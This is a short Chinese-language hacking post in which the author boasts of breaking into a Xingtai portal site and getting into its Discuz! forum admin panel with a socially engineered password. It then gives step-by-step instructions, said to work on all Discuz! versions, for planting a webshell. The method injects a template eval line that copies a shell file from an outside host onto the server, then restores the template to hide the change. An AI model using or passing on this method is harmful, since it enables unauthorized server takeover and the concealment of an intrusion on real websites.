Discuz!的牛逼拿Webshell法，测试可行

无意中入侵了邢台某门户网站，可拿不到Webshell，郁闷中发现里面有个Discuz!论坛，马上根据已经拿到的密码社工，呵呵，居然成功进入后台！可是毕竟是6.0+的版本（管理员把版权去掉了），网上众所周知的编辑模板（模板编辑功能受限）办法来拿SHELL很是不爽，想起来编辑任意模板文件，然后eval出SHELL的方法，终于搞定！下面就是方法的实现步骤：
目前通吃所有DZ版本。
1. 随便选一模板文件，选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt
3. 在任意位置输入:
{eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样

大功告成, 访问/forumdata/shell.php便是可爱的马马。